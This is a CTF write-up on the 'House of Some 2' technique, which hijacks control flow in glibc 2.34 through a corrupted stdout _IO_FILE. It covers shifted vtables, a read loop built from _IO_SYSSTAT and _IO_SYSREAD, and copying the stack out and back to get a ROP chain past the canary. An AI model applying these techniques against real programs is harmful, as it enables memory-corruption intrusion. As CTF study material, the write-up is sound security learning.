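This post continues the series on exploiting _IO_FILE in libc-2.34 and covers how to attack when _IO_file_jumps is not writable, again using the duck challenge from last time as the example.

Challenge: https://www.nssctf.cn/problem/2388

libc source used for debugging: https://ftp.gnu.org/gnu/libc/glibc-2.34.tar.gz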

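Recap and the various Houses

As notes vol.3 explained, in libc-2.34 (and later versions of libc) free_hook can no longer be used to hijack control flow; the new approach is to attack _IO_FILE.

At the end of notes vol.3, because _IO_file_jumps in the duck challenge is writable, I could overwrite the __overflow pointer in _IO_file_jumps with the function I wanted to call and then call puts to trigger _IO_OVERFLOW, which hijacks control flow.

Normally, though, _IO_file_jumps is a const variable, i.e. not writable, so that method only worked because the challenge author deliberately lowered the difficulty.

On top of that, the IO_validate_vtable check means I can't just point vtable at an _IO_jump_t structure that I forged myself.

So how should this be attacked? A quick web search turns up all sorts of weird and wonderful Houses; here are a few of the newer or better-known ones.

Of these, House of apple 1~3 and house of some 1 all use the exit chain (that is what their write-ups say; whether they can be moved to another entry point is something I'll look into when I have time), while house of some 2 uses the puts chain.

Per the analysis last time, the challenge program never exits, so an exit chain doesn't fit. Below I explain how to attack with house of some 2.

House of Some 2

Theory first. @Csome's blog already covers it in quite some detail; I'll restate it here.

Part.1 The entry point of everything

Start with the function _IO_wfile_underflow_maybe_mmap, in libio/wfileops.c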

static wint_t
_IO_wfile_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Doing the underflow will choose mmap
or vanilla operations and then punt to the chosen underflow routine.
Then we can punt to ours. */
if (_IO_file_underflow_maybe_mmap (fp) == EOF)
return WEOF;

return _IO_WUNDERFLOW (fp);
}

It calls _IO_file_underflow_maybe_mmap and _IO_WUNDERFLOW.

Follow into _IO_file_underflow_maybe_mmap, in libio/fileops.c

int
_IO_file_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Choose mmap or vanilla operations
and then punt to the chosen underflow routine. */
decide_maybe_mmap (fp);
return _IO_UNDERFLOW (fp);
}

It calls decide_maybe_mmap and _IO_UNDERFLOW.

Keep following into decide_maybe_mmap, in libio/fileops.c

static void
decide_maybe_mmap (FILE *fp)
{
/* We use the file in read-only mode. This could mean we can
mmap the file and use it without any copying. But not all
file descriptors are for mmap-able objects and on 32-bit
machines we don't want to map files which are too large since
this would require too much virtual memory. */
struct __stat64_t64 st;

if (_IO_SYSSTAT (fp, &st) == 0 // <=
&& S_ISREG (st.st_mode) && st.st_size != 0
/* Limit the file size to 1MB for 32-bit machines. */
&& (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
/* Sanity check. */
&& (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))
{
/* Try to map the file. */
void *p;

p = __mmap64 (NULL, st.st_size, PROT_READ, MAP_SHARED, fp->_fileno, 0);
if (p != MAP_FAILED)
{
/* OK, we managed to map the file. Set the buffer up and use a
special jump table with simplified underflow functions which
never tries to read anything from the file. */

if (__lseek64 (fp->_fileno, st.st_size, SEEK_SET) != st.st_size)
{
(void) __munmap (p, st.st_size);
fp->_offset = _IO_pos_BAD;
}
else
{
_IO_setb (fp, p, (char *) p + st.st_size, 0);

if (fp->_offset == _IO_pos_BAD)
fp->_offset = 0;

_IO_setg (fp, p, p + fp->_offset, p + st.st_size);
fp->_offset = st.st_size;

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps_mmap;
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps_mmap;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps_mmap;

return;
}
}
}

/* We couldn't use mmap, so revert to the vanilla file operations. */

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps; // <=
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps; // <=
}

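The key points are the call to _IO_SYSSTAT (fp, &st) in the middle, and the last few statements, which restore vtable and _wide_vtable: vtable is reset to _IO_file_jumps and _wide_vtable is reset to _IO_wfile_jumps.

_IO_SYSSTAT (fp, &st) is a very special call. st is a local variable on the stack, so &st passes a stack address as an argument to _IO_SYSSTAT, which gives a chance to leak a stack address, or to control the stack, through whatever function _IO_SYSSTAT points to.

Stringing the above together gives these layers of calls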

_IO_wfile_underflow_maybe_mmap (FILE *fp)
> _IO_file_underflow_maybe_mmap (fp)
==> decide_maybe_mmap (fp)
====> _IO_SYSSTAT (fp, &st)
====> // revert vtable and _wide_vtable
==> _IO_UNDERFLOW (fp)
> _IO_WUNDERFLOW (fp)

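Taking a god's-eye view for a moment: assume the _IO_SYSSTAT (fp, &st) step can always be exploited. What I then need is for puts to call _IO_wfile_underflow_maybe_mmap.

Recall from notes vol.3 that puts calls _IO_sputn from _IO_file_jumps through stdout.

Now look at the _IO_jump_t structure that holds _IO_wfile_underflow_maybe_mmap, which is _IO_wfile_jumps_maybe_mmap at libio/wfileops.c:1073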

const struct _IO_jump_t _IO_wfile_jumps_maybe_mmap libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_new_file_finish),
JUMP_INIT(overflow, (_IO_overflow_t) _IO_wfile_overflow),
JUMP_INIT(underflow, (_IO_underflow_t) _IO_wfile_underflow_maybe_mmap), // <=
JUMP_INIT(uflow, (_IO_underflow_t) _IO_wdefault_uflow),
JUMP_INIT(pbackfail, (_IO_pbackfail_t) _IO_wdefault_pbackfail),
JUMP_INIT(xsputn, _IO_wfile_xsputn),
JUMP_INIT(xsgetn, _IO_file_xsgetn),
JUMP_INIT(seekoff, _IO_wfile_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_file_setbuf_mmap),
JUMP_INIT(sync, (_IO_sync_t) _IO_wfile_sync),
JUMP_INIT(doallocate, _IO_wfile_doallocate),
JUMP_INIT(read, _IO_file_read),
JUMP_INIT(write, _IO_new_file_write),
JUMP_INIT(seek, _IO_file_seek),
JUMP_INIT(close, _IO_file_close),
JUMP_INIT(stat, _IO_file_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};

As can be seen, underflow and xsputn above are 3 pointers apart. On a 64-bit machine a pointer is 8 bytes, so they are 0x18 bytes apart.

So if I want puts to call _IO_wfile_underflow_maybe_mmap, I can point the vtable of stdout at &_IO_wfile_jumps_maybe_mmap - 0x18 (a byte offset). Then stdout.vtable->__xsputn lands on _IO_wfile_jumps_maybe_mmap->__underflow, which is _IO_wfile_underflow_maybe_mmap.

stdout.vtable = &_IO_wfile_jumps_maybe_mmap - 0x18

Moreover, &_IO_wfile_jumps_maybe_mmap - 0x18 is a legal address that passes the IO_validate_vtable check.
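To double-check the slot arithmetic, here is a small sketch in Python. The slot list follows the order of the table shown above (JUMP_INIT_DUMMY takes the first two 8-byte slots); the helper names and the base address 0x1000 are made up for illustration and are not glibc or pwntools APIs.

```python
# Slot order of struct _IO_jump_t on 64-bit, following the table above.
# JUMP_INIT_DUMMY fills the first two 8-byte slots.
SLOTS = ["__dummy", "__dummy2", "finish", "overflow", "underflow", "uflow",
         "pbackfail", "xsputn", "xsgetn", "seekoff", "seekpos", "setbuf",
         "sync", "doallocate", "read", "write", "seek", "close", "stat",
         "showmanyc", "imbue"]
OFFSET = {name: i * 8 for i, name in enumerate(SLOTS)}


def shifted_vtable(table_addr, called_slot, wanted_slot):
    """Fake vtable value so that `called_slot` resolves to `wanted_slot`
    of the real table located at `table_addr`."""
    return table_addr + OFFSET[wanted_slot] - OFFSET[called_slot]


def resolves_to(called_slot, shift):
    """Name of the slot actually hit when the vtable is moved by `shift` bytes."""
    return SLOTS[(OFFSET[called_slot] + shift) // 8]


base = 0x1000  # hypothetical address of _IO_wfile_jumps_maybe_mmap
fake = shifted_vtable(base, "xsputn", "underflow")
print(hex(fake - base))                  # shift applied to the table address
print(resolves_to("stat", fake - base))  # slot that _IO_SYSSTAT now hits
```

The same helper gives the shift for any other pairing, for example making the stat slot land on read in a different table.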

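Part.2 Using _IO_SYSREAD to build a call loop

First, see what happens after this change.

Once the vtable of stdout is changed to &_IO_wfile_jumps_maybe_mmap - 0x18, the original stat slot shifts as well and becomes write, so _IO_new_file_write gets called. It can be treated as a plain write call whose fd is the _fileno of stdout.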

ssize_t
_IO_new_file_write (FILE *f, const void *data, ssize_t n)
{
ssize_t to_do = n;
while (to_do > 0)
{
ssize_t count = (__builtin_expect (f->_flags2
& _IO_FLAGS2_NOTCANCEL, 0)
? __write_nocancel (f->_fileno, data, to_do)
: __write (f->_fileno, data, to_do));
if (count < 0)
{
f->_flags |= _IO_ERR_SEEN;
break;
}
to_do -= count;
data = (void *) ((char *) data + count);
}
n -= to_do;
if (f->_offset >= 0)
f->_offset += n;
return n;
}

Then the end of decide_maybe_mmap restores vtable and _wide_vtable, which means _IO_UNDERFLOW calls _IO_file_underflow from _IO_file_jumps, and _IO_WUNDERFLOW calls _IO_wfile_underflow from _IO_wfile_jumps.

So in theory the layers of calls become

_IO_puts (const char *str)
>_IO_wfile_underflow_maybe_mmap (stdout)
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
==> _IO_wfile_underflow (stdout) // _IO_WUNDERFLOW

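Because the original _IO_SYSSTAT (fp, &st) has only two arguments, the third argument of write (the write size) is most likely not controllable, but set that aside for now.

First look at what _IO_file_underflow does, at libio/fileops.c:460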

int
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;

/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;

if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}

/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);

if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);

_IO_release_lock (stdout);
}

_IO_switch_to_get_mode (fp);

/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base, // <=
fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)

It's fairly long; the key point is the call in the middle

count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base);

which is _IO_file_read from _IO_file_jumps

ssize_t
_IO_file_read (FILE *fp, void *buf, ssize_t size)
{
return (__builtin_expect (fp->_flags2 & _IO_FLAGS2_NOTCANCEL, 0)
? __read_nocancel (fp->_fileno, buf, size)
: __read (fp->_fileno, buf, size));
}
libc_hidden_def (_IO_file_read)

This can roughly be understood as a call to read whose fd is the _fileno of stdout

read(stdout.file._fileno, stdout.file._IO_buf_base, stdout.file._IO_buf_end - stdout.file._IO_buf_base)

Since the earlier UAF gives control over stdout.file, all three arguments are controllable, so I can write anywhere. Setting

stdout.file._fileno      = 0
stdout.file._IO_buf_base = &buf
stdout.file._IO_buf_end = &buf + n

results in the call

read(0, &buf, n)
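As a rough sketch of that mapping, the three read arguments can be turned into FILE field values like this. The offsets 0x38, 0x40 and 0x70 are the ones used by the payloads later in this post; the helper names and the sample address are hypothetical, and every field is packed as 8 bytes the way pwntools flat would, which also zeroes the 4 bytes after _fileno.

```python
import struct

# Field offsets inside struct _IO_FILE on x86-64, as used by the payloads in this post.
OFF_IO_BUF_BASE = 0x38
OFF_IO_BUF_END = 0x40
OFF_FILENO = 0x70
FILE_PLUS_SIZE = 0xe0  # sizeof(struct _IO_FILE_plus)


def fields_for_read(buf, n, fd=0):
    """Field values that make _IO_SYSREAD behave like read(fd, buf, n)."""
    return {OFF_FILENO: fd, OFF_IO_BUF_BASE: buf, OFF_IO_BUF_END: buf + n}


def pack_fields(fields, size=FILE_PLUS_SIZE):
    """Lay the fields out in a zero-filled image (each value as 8 bytes)."""
    image = bytearray(size)
    for off, value in fields.items():
        struct.pack_into("<Q", image, off, value)
    return bytes(image)


image = pack_fields(fields_for_read(0x404000, 0x100))  # 0x404000 is a made-up buffer address
print(len(image))
```

This only covers the three read arguments; a real payload also needs the flags, _wide_data, _mode and vtable fields discussed in the rest of the post.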

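The question is what to write.

If the third argument of the earlier write (stdout.file._fileno, &st, ??) is large enough, it could leak a stack address, and then I could write a rop chain onto the stack, i.e. a stack overflow.

But rdx is unlikely to be large at that point, and in my tests it wasn't, so the stack address can't be leaked.

Looking further, there is still an _IO_WUNDERFLOW (fp) call afterwards. So if _IO_SYSREAD is used to write over stdout once more, then as long as the length is sufficient, three things can be written:

  1. The fields of stdout.file, to change the arguments and get past the various conditions
  2. The struct _IO_wide_data *_wide_data of stdout.file; pointing it at a forged struct _IO_wide_data lets me change the _wide_vtable used by _IO_WIDE_JUMPS
  3. The vtable of stdout; more on this further down

First, changing stdout.file._wide_data->_wide_vtable makes _IO_WUNDERFLOW call an arbitrary function. struct _IO_wide_data is defined in libio/libio.h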

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */

__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;

wchar_t _shortbuf[1];

const struct _IO_jump_t *_wide_vtable; // <=
};

#define _IO_WIDE_JUMPS(THIS) \
_IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)

#define WJUMP0(FUNC, THIS) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS)
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define WJUMP2(FUNC, THIS, X1, X2) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2)
#define WJUMP3(FUNC, THIS, X1,X2,X3) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1,X2, X3)

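PS: one small detail is that _IO_WIDE_JUMPS_FUNC, unlike _IO_JUMPS_FUNC, has no IO_validate_vtable check, so _wide_vtable can actually point at an _IO_jump_t that I forged myself. But as @CSOME notes, that check may be added in the future, so everything below assumes _IO_WIDE_JUMPS_FUNC is checked too.

At this point I still want to hit _IO_SYSSTAT (fp, &st), and the only way to trigger it again is to point _IO_WUNDERFLOW back at _IO_wfile_underflow_maybe_mmap, which amounts to setting

stdout.file._wide_data->_wide_vtable = &_IO_wfile_jumps_maybe_mmap

The calls then become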

_IO_puts (const char *str)
>_IO_wfile_underflow_maybe_mmap (stdout) // loop
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
======> read(0, &_IO_2_1_stdout_, n) // modify _wide_vtable
==> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW

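which amounts to a call loop.

Part.3 Using _IO_SYSSTAT to call arbitrary vtable functions

Now for how modifying vtable can be exploited.

Once the loop above is in place, it can be nested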

// entrance
_IO_puts (const char *str)
> _IO_wfile_underflow_maybe_mmap (stdout) // loop
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
======> read(0, &_IO_2_1_stdout_, n0) // modify _wide_vtable
==> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
// first loop
====> _IO_file_underflow_maybe_mmap (stdout)
======> decide_maybe_mmap (stdout)
========> _IO_SYSSTAT (stdout, &st, ??) // arbitrary _IO_jump_t function
========> // revert vtable and _wide_vtable
======> _IO_file_underflow (stdout) // _IO_UNDERFLOW
========> read(0, &_IO_2_1_stdout_, n1) // modify _wide_vtable
====> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW

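That is, by modifying vtable, the _IO_SYSSTAT inside can call any function found in an _IO_jump_t table.

As an example, suppose I want to use read to overwrite the return address on the stack after &st. I can make _IO_SYSSTAT point to _IO_file_read, that is

stdout.vtable = &_IO_file_jumps - 0x20

Then the _IO_SYSSTAT (stdout, &st, ??) above is the call

_IO_file_read(stdout, &st, ??)

which in turn calls

read(stdout.file._fileno, &st, ??)

The awkward part is that read takes three arguments while a normal _IO_SYSSTAT takes only two, so the third argument, the number of bytes to transfer, cannot be controlled directly.

So @CSOME makes an assumption. Remember that the entry performed one

read(0, &_IO_2_1_stdout_, n)

whose third argument is controllable

n = stdout.file._IO_buf_end - stdout.file._IO_buf_base

If the rdx register is not touched between this read and the _IO_SYSSTAT call in my first loop, rdx still holds this n when _IO_SYSSTAT is called, so the third argument is controlled, equivalent to calling

_IO_SYSSTAT (stdout, &st, n)

This is a pretty strong assumption, since rdx is a commonly used register. According to @CSOME, though, newer libc versions use rdx less in order to make rop harder.

Well, I'll take his word for it for now; in any case the libc shipped with the challenge can't be exploited this way.

With a self-compiled libc, optimization has to be at least O3 for this to work (judging by the offsets, the challenge's libc is probably O2). At O2 and below there is an unavoidable spot that sets rdx to an unusable value; more on that when I get to the challenge.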

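Part.4 Bypassing the canary

Even assuming rdx can be controlled, there is another problem: when overwriting the return address on the stack after &st, the canary is unknown.

Nor can the canary be leaked with write or similar, because inside this loop I need

stdout.file._fileno = 0

to guarantee entry into the next iteration, i.e. to be able to overwrite the stack with read after leaking the canary,

whereas output via write needs _fileno = 1.

PS: my self-compiled libc doesn't seem to have a canary here at all. I don't know why; it may be related to build flags. If the challenge's libc has none either, read can be used directly. What follows covers the case where there is a canary.

So the brilliant @Csome came up with a way to move the stack using _IO_default_xsputn and _IO_default_xsgetn.

_IO_default_xsputn

First look at _IO_default_xsputn. It is used by _IO_str_jumps in libio/strops.c and by _IO_str_chk_jumps in libio/opvsprintf.c, and is defined in libio/genops.c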

size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > more)
count = more;
if (count > 20)
{
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count); // <=
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}
libc_hidden_def (_IO_default_xsputn)

The main thing to look at is

__mempcpy (f->_IO_write_ptr, s, count)

Reaching this point gives

mempcpy(stdout.file._IO_write_ptr, &st, stdout.file._IO_write_end - stdout.file._IO_write_ptr)

That is, stdout.file._IO_write_end - stdout.file._IO_write_ptr bytes starting at &st are copied to wherever stdout.file._IO_write_ptr points.

So the stack can be copied to a place of my choosing.

Further down there is

if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)

Because the vtable of stdout has been modified, _IO_OVERFLOW is not actually _IO_file_overflow here and may well crash.

So first see whether more == 0 can be made true, short-circuiting the rest.

Here more starts as rdx, and I need more - count == 0, which just means

count = stdout.file._IO_write_end - stdout.file._IO_write_ptr == rdx

rdx is the third argument of _IO_default_xsputn. If it is called by pointing _IO_SYSSTAT at _IO_default_xsputn, then by the assumption above it equals the previous stdout.file._IO_buf_end - stdout.file._IO_buf_base.

In other words, if stdout.file._IO_write_end - stdout.file._IO_write_ptr at this _IO_SYSSTAT call equals stdout.file._IO_buf_end - stdout.file._IO_buf_base from the previous round, the if condition is bypassed.
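To make the short-circuit condition concrete, here is a simplified Python model of the first pass through the loop in _IO_default_xsputn. It tracks only the counters, not the memory being copied, and the function name is made up for this sketch.

```python
def default_xsputn_model(write_ptr, write_end, n):
    """Model the first loop iteration of _IO_default_xsputn.

    Returns (bytes_copied, overflow_called): how many bytes the copy step
    moves, and whether the `more == 0 || _IO_OVERFLOW (...)` test would
    fall through to _IO_OVERFLOW.
    """
    more = n
    if more <= 0:
        return 0, False
    copied = 0
    if write_ptr < write_end:            # "Space available."
        count = min(write_end - write_ptr, more)
        copied = count
        more -= count
    return copied, more != 0             # more == 0 short-circuits the ||


# Write window sized exactly like the third argument: no _IO_OVERFLOW call.
print(default_xsputn_model(0x1000, 0x10e0, 0xe0))
# Third argument larger than the window: _IO_OVERFLOW would be reached.
print(default_xsputn_model(0x1000, 0x10e0, 0x100))
```

So the write window has to be exactly as large as whatever ends up in rdx; a larger rdx runs into _IO_OVERFLOW through the shifted vtable.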

_IO_default_xsgetn

_IO_default_xsgetn is more or less the inverse of _IO_default_xsputn. Source first, also in libio/genops.c

size_t
_IO_default_xsgetn (FILE *fp, void *data, size_t n)
{
size_t more = n;
char *s = (char*) data;
for (;;)
{
/* Data available. */
if (fp->_IO_read_ptr < fp->_IO_read_end)
{
size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
if (count > more)
count = more;
if (count > 20)
{
s = __mempcpy (s, fp->_IO_read_ptr, count); // <=
fp->_IO_read_ptr += count;
}
else if (count)
{
char *p = fp->_IO_read_ptr;
int i = (int) count;
while (--i >= 0)
*s++ = *p++;
fp->_IO_read_ptr = p;
}
more -= count;
}
if (more == 0 || __underflow (fp) == EOF)
break;
}
return n - more;
}
libc_hidden_def (_IO_default_xsgetn)

The key point is

__mempcpy (s, fp->_IO_read_ptr, count)

which at this point amounts to

mempcpy(&st, stdout.file._IO_read_ptr, stdout.file._IO_read_end - stdout.file._IO_read_ptr)

That is, stdout.file._IO_read_end - stdout.file._IO_read_ptr bytes at stdout.file._IO_read_ptr are copied back to &st.

So a chunk of content of my choosing can be copied back onto the stack.

Likewise there is an __underflow call here that may need to be bypassed

if (more == 0 || __underflow (fp) == EOF)

so I may need

count = stdout.file._IO_read_end - stdout.file._IO_read_ptr == rdx

i.e. stdout.file._IO_read_end - stdout.file._IO_read_ptr at this _IO_SYSSTAT call equals stdout.file._IO_buf_end - stdout.file._IO_buf_base from the previous round.

PS: one slightly imperfect thing about this step is that _IO_read_ptr and _IO_read_end must be set, and _IO_file_underflow has this check before _IO_SYSREAD

if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

So if _IO_default_xsgetn is to be run, this check cannot be bypassed, which means the loop cannot continue afterwards.

But since the rop chain is already written by then, ending the loop is no problem.

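How to write the stack

Combining _IO_default_xsputn and _IO_default_xsgetn gives

  1. Use _IO_default_xsputn to copy the contents from &st onward to a place I control
  2. On the copied stack, write the return address while leaving the canary alone, or leak the canary
  3. Use _IO_default_xsgetn to copy the modified stack back to &st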
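The three steps can be mimicked on a plain byte buffer. This is only a toy model: RET_OFFSET uses the 0xb8 value measured later in this post, while CANARY_OFFSET, the canary value and the two rop words are invented for illustration.

```python
import struct

RET_OFFSET = 0xb8      # &st -> saved return address (value measured later in this post)
CANARY_OFFSET = 0xa8   # hypothetical canary position, for illustration only


def patch_stack_copy(stack, rop_words):
    """Copy the stack out, edit only from the return address on, and hand it back."""
    staging = bytearray(stack)                    # step 1: xsputn-style copy out
    for i, word in enumerate(rop_words):          # step 2: skip the canary, patch retn
        struct.pack_into("<Q", staging, RET_OFFSET + 8 * i, word)
    return bytes(staging)                         # step 3: xsgetn-style copy back


stack = bytearray(RET_OFFSET + 0x10)              # fake stack window starting at &st
struct.pack_into("<Q", stack, CANARY_OFFSET, 0x1122334455667700)
patched = patch_stack_copy(stack, [0x401000, 0x401008])
print(patched[CANARY_OFFSET:CANARY_OFFSET + 8] == bytes(stack[CANARY_OFFSET:CANARY_OFFSET + 8]))
```

The point is that the canary bytes make the round trip untouched, so their value never has to be known.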

The calls then become two loops followed by the rop chain

// entrance
_IO_puts (const char *str)
> _IO_wfile_underflow_maybe_mmap (stdout) // loop
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
======> read(0, &_IO_2_1_stdout_, n0) // modify _wide_vtable
==> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
// first loop
====> _IO_file_underflow_maybe_mmap (stdout)
======> decide_maybe_mmap (stdout)
========> _IO_default_xsputn (stdout, &st, rdx)
==========> __mempcpy (_IO_write_ptr, &st, count) // copy &st to _IO_write_ptr
========> // revert vtable and _wide_vtable
======> _IO_file_underflow (stdout) // _IO_UNDERFLOW
========> read(0, &_IO_2_1_stdout_, n1) // modify _wide_vtable
====> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
// second loop
======> _IO_file_underflow_maybe_mmap (stdout)
========> decide_maybe_mmap (stdout)
==========> _IO_default_xsgetn (stdout, &st, rdx)
============> __mempcpy (&st, _IO_read_ptr, count) // copy _IO_read_ptr back to &st
==========> // revert vtable and _wide_vtable
========> _IO_file_underflow (stdout) // _IO_UNDERFLOW
==========> // pass _IO_SYSREAD
========> // return to rop
======> rop

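duck(O3)

Theory is theory; in practice some details differ.

Back to the duck challenge, which differs from the conditions @CSOME describes in a few ways

  1. The library is libc-2.34, not libc-2.35 or later
  2. The library was compiled by the challenge author, not Ubuntu GLIBC 2.**

The short version: the challenge's own libc can't be exploited this way. A libc compiled yourself at O3 or above can, but with differences from the pure House of Some 2.

Below I describe what differs when attacking libc-2.34-O3, and cover some House of Some 2 details along the way.

First, the library I built: libc-2.34-debug-O3.zip

Alternatively, compile it yourself by following the linked build guide. Build commands (change /path/to/glibc-2.34/x64 to your own glibc-2.34/x64 location)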

mkdir build x64
cd build
CC="gcc" CXX="g++" \
CFLAGS="-g -g3 -ggdb -gdwarf-4 -O3 -Wno-error" \
CXXFLAGS="-g -g3 -ggdb -gdwarf-4 -O3 -Wno-error" \
../configure --prefix=/path/to/glibc-2.34/x64 --disable-werror
make -j8
make install

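Part.1 Entry

Notes vol.3 already leaked heap_base and libc_base, and also gave an arbitrary-address write of 0x100 bytes.

Following House of Some 2, the next step is to write _IO_2_1_stdout_. Its size is 0xe0, so 0x100 bytes is just enough.

Next, what exactly needs to be written.

First, puts has to enter _IO_wfile_underflow_maybe_mmap, so _IO_XSPUTN must point to _IO_wfile_underflow_maybe_mmap, i.e. the vtable of _IO_2_1_stdout_ must be &_IO_wfile_jumps_maybe_mmap - 0x18.

Then, inside decide_maybe_mmap, the following if condition must be false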

if (_IO_SYSSTAT (fp, &st) == 0
&& S_ISREG (st.st_mode) && st.st_size != 0
/* Limit the file size to 1MB for 32-bit machines. */
&& (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
/* Sanity check. */
&& (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))

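Only then does the function avoid returning from inside the if, which would skip the restoration of vtable and _wide_vtable.

In my own tests, with _IO_SYSSTAT replaced this if almost always fails. If it really doesn't, (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size) can be forced false.

Next, when vtable and _wide_vtable are restored, vtable must end up pointing at _IO_file_jumps, so _mode <= 0 is required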

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps;
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;

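Also note the statement fp->_wide_data->_wide_vtable: _wide_data must point to a writable address, otherwise this statement crashes.

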